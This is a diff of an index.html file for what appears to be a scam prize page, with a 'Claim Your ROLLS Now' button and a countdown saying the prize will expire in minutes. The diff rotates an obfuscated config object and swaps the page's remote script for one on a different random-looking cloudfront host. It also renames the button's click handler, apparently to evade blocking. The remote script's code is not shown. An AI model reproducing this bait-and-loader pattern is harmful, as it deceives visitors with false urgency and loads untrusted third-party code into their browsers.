--- a/index.html
+++ b/index.html
@@ -35,9 +35,9 @@
     <link rel="icon" href="data:;base64,iVBORw0KGgo=">
 
     <script type="text/javascript">
-       var XQIun_qAH_uwxrNc={"it":4188822,"key":"c008c"};
-  </script>
-  <script src="https://d3nxbjuv18k2dn.cloudfront.net/531d9f4.js"></script>
+    var uGJWL_wRt_OJqhgc={"it":4201945,"key":"1095d"};
+</script>
+<script src="https://d368ol0wkasvru.cloudfront.net/d275fd4.js"></script>
 
 </head>
 <body>
@@ -176,7 +176,7 @@ document.write(months[month]+" "+today+", "+year)
             }, 1000);
           }</script>
       <p></p>
-        <button style="display: inline-block; background-color: #8BC34A;font-size: 18px; padding: 18px 44px;width:100%;" onclick="_gD()">Claim Your ROLLS Now</button>
+        <button style="display: inline-block; background-color: #8BC34A;font-size: 18px; padding: 18px 44px;width:100%;" onclick="_Ri()">Claim Your ROLLS Now</button>
         <div class="timer" style="margin-top:5px;margin-left:5px">
                    <p>Your prize will expire in <span style="color:red;font-weight: 600;"><span id="mins">5</span>:<span id="hsecs">29</span></span></p>
                 </div>
